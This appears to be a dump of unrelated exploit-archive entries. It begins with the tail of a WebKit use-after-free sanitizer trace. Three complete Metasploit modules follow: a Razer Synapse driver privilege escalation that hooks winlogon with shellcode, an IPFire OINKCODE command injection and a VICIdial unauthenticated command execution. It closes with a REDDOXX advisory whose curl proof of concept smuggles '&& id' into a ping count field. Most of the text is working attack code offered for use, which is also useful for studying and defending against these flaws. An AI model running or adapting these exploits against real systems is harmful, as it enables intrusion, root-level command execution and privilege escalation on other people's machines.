#19 0x113cf8040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)
#20 0x1150877c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)
#21 0x107b5b476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)
#22 0x107b58b08 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3acb08)
#23 0x107e6f044 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6c3044)
#24 0x7fffe41e0ab1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55cab1)
#25 0x7fffe3d3cb57 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8b57)
#26 0x7fffe3d4a12d in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc612d)
#27 0x7fffe3e235ce in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x19f5ce)
#28 0x107962cb5 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage*, WebKit::WebFrame*, WTF::RefPtr<API::Object>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x1b6cb5)
#29 0x107e799ae in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6cd9ae)
previously allocated by thread T0 here:
#0 0x10a780d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x10f5d6ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x10f5cbc4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x10f561437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x10f560768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x112913e08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08)
#7 0x11352cd43 in WebCore::HTMLLinkElement::create(WebCore::QualifiedName const&, WebCore::Document&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd60d43)
#8 0x1134e098d in WebCore::linkConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd1498d)
#9 0x1134dd1a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4)
#10 0x1134a1ac9 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9)
#11 0x1134a0e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17)
#12 0x1134a2263 in WebCore::HTMLConstructionSite::insertSelfClosingHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd6263)
#13 0x113602ad0 in WebCore::HTMLTreeBuilder::processStartTagForInHead(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe36ad0)
#14 0x1136012b2 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe352b2)
#15 0x1135fea43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43)
#16 0x1135fc83e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e)
#17 0x1134cebba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba)
#18 0x1134ce779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779)
#19 0x1134cd9a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6)
#20 0x1134ceed4 in WebCore::HTMLDocumentParser::insert(WebCore::SegmentedString&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02ed4)
#21 0x1134d03cb in WebCore::HTMLDocumentParser::parseDocumentFragment(WTF::String const&, WebCore::DocumentFragment&, WebCore::Element&, WebCore::ParserContentPolicy) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd043cb)
#22 0x1147fced5 in WebCore::createFragmentForInnerOuterHTML(WebCore::Element&, WTF::String const&, WebCore::ParserContentPolicy) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2030ed5)
#23 0x1130ee983 in WebCore::Element::setInnerHTML(WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922983)
#24 0x113d27314 in WebCore::setJSElementInnerHTMLFunction(JSC::ExecState&, WebCore::JSElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155b314)
#25 0x113d15f07 in bool WebCore::BindingCaller<WebCore::JSElement>::setAttribute<&(WebCore::setJSElementInnerHTMLFunction(JSC::ExecState&, WebCore::JSElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1549f07)
#26 0x10e21dbf8 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x89bbf8)
#27 0x10e21dd27 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x89bd27)
#28 0x10ecf72a9 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x13752a9)
#29 0x10eed8fa1 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1556fa1)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3a51cc) in JSC::Weak<WebCore::JSDOMObject>::get() const
Shadow bytes around the buggy address:
0x1c2200010f40: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c2200010f50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c2200010f60: 00 00 fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x1c2200010f70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c2200010f80: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
=>0x1c2200010f90: fa fa fa fa fa fa fa fa fd[fd]fd fd fd fd fd fd
0x1c2200010fa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c2200010fb0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa
0x1c2200010fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c2200010fd0: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
0x1c2200010fe0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==29632==ABORTING
-->
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/local/windows_kernel'
require 'rex'
require 'metasm'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Local::WindowsKernel
include Msf::Post::Windows::Priv
# the max size our hook can be, used before it's generated for the allocation
HOOK_STUB_MAX_LENGTH = 256
def initialize(info = {})
super(update_info(info,
'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess',
'Description' => %q{
A vulnerability exists in the latest version of Razer Synapse
(v2.20.15.1104 as of the day of disclosure) which can be leveraged
locally by a malicious application to elevate its privileges to those of
NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
in the rzpnk.sys driver that passes a PID specified by the user to
ZwOpenProcess. This can be issued by an application to open a handle to
an arbitrary process with the necessary privileges to allocate, read and
write memory in the specified process.
This exploit leverages this vulnerability to open a handle to the
winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
installing a hook to execute attacker controlled shellcode. This hook is
then triggered on demand by calling user32!LockWorkStation(), resulting
in the attacker's payload being executed with the privileges of the
infected winlogon process. In order for the issued IOCTL to work, the
RazerIngameEngine.exe process must not be running. This exploit will
check if it is, and attempt to kill it as necessary.
The vulnerable software can be found here:
https://www.razerzone.com/synapse/. No Razer hardware needs to be
connected in order to leverage this vulnerability.
This exploit is not opsec-safe due to the user being logged out as part
of the exploitation process.
},
'Author' => 'Spencer McIntyre',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2017-9769'],
['URL', 'https://warroom.securestate.com/cve-2017-9769/']
],
'Platform' => 'win',
'Targets' =>
[
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 10.0.10586
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => 20
},
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => 'Mar 22 2017'))
end
def check
# Validate that the driver has been loaded and that
# the version is the same as the one expected
client.sys.config.getdrivers.each do |d|
if d[:basename].downcase == 'rzpnk.sys'
expected_checksum = 'b4598c05d5440250633e25933fff42b0'
target_checksum = client.fs.file.md5(d[:filename])
if expected_checksum == Rex::Text.to_hex(target_checksum, '')
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
end
end
Exploit::CheckCode::Safe
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if session.platform != 'windows'
fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
elsif session.arch != ARCH_X64
fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
end
pid = session.sys.process['RazerIngameEngine.exe']
if pid
# if this process is running, the IOCTL won't work but the process runs
# with user privileges so we can kill it
print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")
session.sys.process.kill(pid)
end
pid = session.sys.process['winlogon.exe']
print_status("Found winlogon pid: #{pid}")
handle = get_handle(pid)
fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?
vprint_status('Successfully opened a handle to the winlogon process')
winlogon = session.sys.process.new(pid, handle)
allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH
shellcode_address = winlogon.memory.allocate(allocation_size)
winlogon.memory.protect(shellcode_address)
print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}")
winlogon.memory.write(shellcode_address, payload.encoded)
hook_stub_address = shellcode_address + payload.encoded.length
result = session.railgun.kernel32.LoadLibraryA('user32')
fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0
user32_handle = result['return']
# resolve and backup the functions that we'll install trampolines in
user32_trampolines = {} # address => original chunk
user32_functions = ['LockWindowStation']
user32_functions.each do |function|
address = get_address(user32_handle, function)
winlogon.memory.protect(address)
user32_trampolines[function] = {
address: address,
original: winlogon.memory.read(address, 24)
}
end
# generate and install the hook asm
hook_stub = get_hook(shellcode_address, user32_trampolines)
fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
# if this happens, there was a programming error
fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH
winlogon.memory.write(hook_stub_address, hook_stub)
vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}")
# install the asm trampolines to jump to the hook
user32_trampolines.each do |function, trampoline_info|
address = trampoline_info[:address]
trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{
mov rax, 0x#{address.to_s(16)}
push rax
mov rax, 0x#{hook_stub_address.to_s(16)}
jmp rax
}).encode_string
winlogon.memory.write(address, trampoline)
vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}")
end
session.railgun.user32.LockWorkStation()
session.railgun.kernel32.CloseHandle(handle)
end
def get_address(dll_handle, function_name)
result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name)
fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0
result['return']
end
# this is where the actual vulnerability is leveraged
def get_handle(pid)
handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
return nil unless handle
vprint_status('Successfully opened a handle to the driver')
buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')
session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[
['DWORD', 'FileHandle', 'in' ],
['DWORD', 'Event', 'in' ],
['LPVOID', 'ApcRoutine', 'in' ],
['LPVOID', 'ApcContext', 'in' ],
['PDWORD', 'IoStatusBlock', 'out'],
['DWORD', 'IoControlCode', 'in' ],
['PBLOB', 'InputBuffer', 'in' ],
['DWORD', 'InputBufferLength', 'in' ],
['PBLOB', 'OutputBuffer', 'out'],
['DWORD', 'OutputBufferLength', 'in' ],
])
result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length)
return nil if result['return'] != 0
session.railgun.kernel32.CloseHandle(handle)
result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1]
end
def get_hook(shellcode_address, restore)
dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return']
return nil if dll_handle == 0
create_thread_address = get_address(dll_handle, 'CreateThread')
stub = %{
call main
; restore the functions where the trampolines were installed
push rbx
}
restore.each do |function, trampoline_info|
original = trampoline_info[:original].unpack('Q*')
stub << "mov rax, 0x#{trampoline_info[:address].to_s(16)}"
original.each do |chunk|
stub << %{
mov rbx, 0x#{chunk.to_s(16)}
mov qword ptr ds:[rax], rbx
add rax, 8
}
end
end
stub << %{
pop rbx
ret
main:
; backup registers we're going to mangle
push r9
push r8
push rdx
push rcx
; setup the arguments for the call to CreateThread
xor rax, rax
push rax ; lpThreadId
push rax ; dwCreationFlags
xor r9, r9 ; lpParameter
mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress
xor rdx, rdx ; dwStackSize
xor rcx, rcx ; lpThreadAttributes
mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread
call rax
add rsp, 16
; restore arguments that were mangled
pop rcx
pop rdx
pop r8
pop r9
ret
}
Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string
end
end
##
## This module requires Metasploit: https://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'IPFire proxy.cgi RCE',
'Description' => %q(
IPFire, a free linux based open source firewall distribution,
version < 2.19 Update Core 110 contains a remote command execution
vulnerability in the ids.cgi page in the OINKCODE field.
),
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # module
'0x09AL' # discovery
],
'References' =>
[
[ 'EDB', '42149' ]
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' => { 'SSL' => true },
'Arch' => [ ARCH_CMD ],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl awk openssl'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 09 2017'
)
)
register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', '']),
Opt::RPORT(444)
]
)
end
def check
begin
# authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
# after a chat with @bcoles in IRC.
res = send_request_cgi(
'uri' => '/cgi-bin/pakfire.cgi',
'method' => 'GET',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
)
if res && res.code == 200
/\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
end
if version.nil? || update.nil? || !Gem::Version.correct?(version)
vprint_error('No Recognizable Version Found')
CheckCode::Safe
elsif Gem::Version.new(version) <= Gem::Version.new('2.19') && update.to_i <= 110
CheckCode::Appears
else
vprint_error('Version and/or Update Not Supported')
CheckCode::Safe
end
rescue ::Rex::ConnectionError
print_error("Connection Failed")
CheckCode::Safe
end
end
def exploit
begin
# authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
# after a chat with @bcoles in IRC.
vprint_status('Sending request')
res = send_request_cgi(
'uri' => '/cgi-bin/ids.cgi',
'method' => 'POST',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>
{
'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
},
'vars_post' => {
'ENABLE_SNORT_GREEN' => 'on',
'ENABLE_SNORT' => 'on',
'RULES' => 'registered',
'OINKCODE' => "`#{payload.encoded}`",
'ACTION' => 'Download new ruleset',
'ACTION2' => 'snort'
}
)
# success means we hang our session, and wont get back a response, so just check we get a response back
if res && res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'VICIdial user_authorization Unauthenticated Command Execution',
'Description' => %q{
This module exploits a vulnerability in VICIdial versions
2.9 RC 1 to 2.13 RC1 which allows unauthenticated users
to execute arbitrary operating system commands as the web
server user if password encryption is enabled (disabled
by default).
When password encryption is enabled the user's password
supplied using HTTP basic authentication is used in a call
to exec().
This module has been tested successfully on version 2.11 RC2
and 2.13 RC1 on CentOS.
},
'License' => MSF_LICENSE,
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
'References' =>
[
['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
# HTTP Basic authentication password
'Space' => 2048,
# apostrophe ('), quote ("), semi-colon (;) and backslash (\)
# are removed by preg_replace
'BadChars' => "\x00\x0A\x22\x27\x3B\x5C",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python netcat'
}
},
'Targets' => [[ 'Automatic Targeting', {} ]],
'Privileged' => false,
'DisclosureDate' => 'May 26 2017',
'DefaultTarget' => 0))
register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ])
deregister_options('USERNAME', 'PASSWORD')
end
def check
user = rand_text_alpha(rand(10) + 5)
pass = "#{rand_text_alpha(rand(10) + 5)}&#"
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
'authorization' => basic_auth(user, pass)
unless res
vprint_status 'Connection failed'
return CheckCode::Unknown
end
if res.code != 401
vprint_status "#{peer} Unexpected reply. Expected authentication failure."
return CheckCode::Safe
end
# Check for input filtering of '#' and '&' characters in password
# Response for invalid credentials is in the form of: |<username>|<password>|BAD|
if res.body !~ /\|#{user}\|#{pass}\|BAD\|/
vprint_status "#{peer} Target is patched."
return CheckCode::Safe
end
# Check for ../agc/bp.pl password encryption script
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl')
if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/
vprint_status "#{peer} Password encryption is supported, but may not be enabled."
return CheckCode::Appears
end
vprint_status "#{peer} Could not verify whether password encryption is supported."
CheckCode::Detected
end
def execute_command(cmd, opts = {})
user = rand_text_alpha(rand(10) + 5)
pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #"
print_status "#{peer} Sending payload (#{cmd.length} bytes)"
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
'authorization' => basic_auth(user, pass)
if !res
fail_with(Failure::Unreachable, 'Connection failed')
elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/
print_good "#{peer} Payload sent successfully"
else
fail_with(Failure::UnexpectedReply, 'Unexpected reply')
end
end
def exploit
execute_command(payload.encoded)
end
end
Advisory: Remote Command Execution as root in REDDOXX Appliance
RedTeam Pentesting discovered a remote command execution vulnerability
in the REDDOXX appliance software, which allows attackers to execute
arbitrary command with root privileges while unauthenticated.
Details
=======
Product: REDDOXX Appliance
Affected Versions: <= Build 2032 / v2.0.625
Fixed Versions: Version 2032 SP2
Vulnerability Type: Remote Command Execution
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-009
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clientsâ?? requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."
(from the vendor's homepage)
More Details
============
The administrative interface of the REDDOXX appliance [0] offers several
diagnostic tools in the "Diagnostic Center". Ping is one of these tools.
The interface for this tool contains two input fields, which allow users
to specify a target host and a packet count. Through the ISO provided on
the vendor's homepage [1], it was possible to analyze how these commands
are embedded into the command-line of the ping command:
------------------------------------------------------------------------
function ExecuteDiag($parameter)
{
// Here we do the main thing ...
$cmd = "ping '" . $parameter->targetHost . "' -c " . $parameter->count;
$this->PrintHeader();
$this->PrintHeadLine(array('Result Message', 'Status'));
$this->PrintOut("<tr>");
$this->PrintOut("<td class=mytd><PRE>");
passthru($cmd, $rc);
$this->PrintOut("</PRE></td>");
$this->PrintStatus($rc);
$this->PrintOut("</tr>");
$this->PrintEnd();
$result = new stdClass;
$result->ResultCode = $rc;
$result->MessageText = "";
$this->SaveResult($result);
}
------------------------------------------------------------------------
As can be seen in the listing above, the parameters are embedded into a
string stored in the variable $cmd. The target host parameter is
surrounded with single quotes, while the count parameter is not.
Before the parameters are actually embedded into the ping command-line
however, the following function performs a check for "illegal
characters":
------------------------------------------------------------------------
public static function CheckShellParameter($parameter, $key = "")
{
if (!is_array($parameter))
$parameter = array($parameter);
foreach ($parameter as $value) {
if (preg_match("/[';<>\"]/", $value)) {
$paramNameMsg = "";
if ($key)
$paramNameMsg = " in parameter '$key'";
throw new Exception("Invalid value" . $paramNameMsg . ". Illegal characters found.", 1);
}
}
}
------------------------------------------------------------------------
These are characters, which can be used to append additional commands to
the command line. While this check prevents certain kinds of attacks, it
is incomplete and can therefore be bypassed. For example, && (AND) and
|| (OR) operators can still be used to append additional commands to the
command-line. Submitting a count target host of "127.0.0.1" and a count
of "1 || id" leads to the following command-line being passed to the PHP
passthru() function and executed:
------------------------------------------------------------------------
ping '127.0.0.1' -c 1 || id
------------------------------------------------------------------------
This causes the command "id" to be executed after the execution of the
ping command is completed.
Proof of Concept
================
The following curl command-lines can be used to trigger the
vulnerability.
First, the diagnose function ping is called as follows:
------------------------------------------------------------------------
$ curl -H 'Content-Type: application/json' --data '{"Name":"Ping",''"Parameter":{"targetHost":"127.0.0.1","count":"1''&& echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'"}}' http://www.example.com/api/v1/rws/diagnose/start
------------------------------------------------------------------------
Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo
'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are
only used to distinguish the output of the "id" command in the final
result, which can be retrieved and displayed using the following curl
command-line:
------------------------------------------------------------------------
$ curl --silent -H 'Accept: application/json' http://www.example.com/api/v1/rws/diagnose/result/Ping | jq .Output | sed 's;.*REDTEAM_MARKER_START\\n\(.*\)\\nREDTEAM_MARKER_END.*;\1;' | sed 's/\\n/\n/g'
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------------------
Workaround
==========
None
Fix
===
Update the appliance software to Version 2032 SP2.
Security Risk
=============
The diagnostic functions offered by the REDDOXX appliance allow attackers
to execute arbitrary commands. Since the commands are executed with root
privileges and no authentication is required, this is rated as a high
risk.
Timeline
========
2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released
References
==========
[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
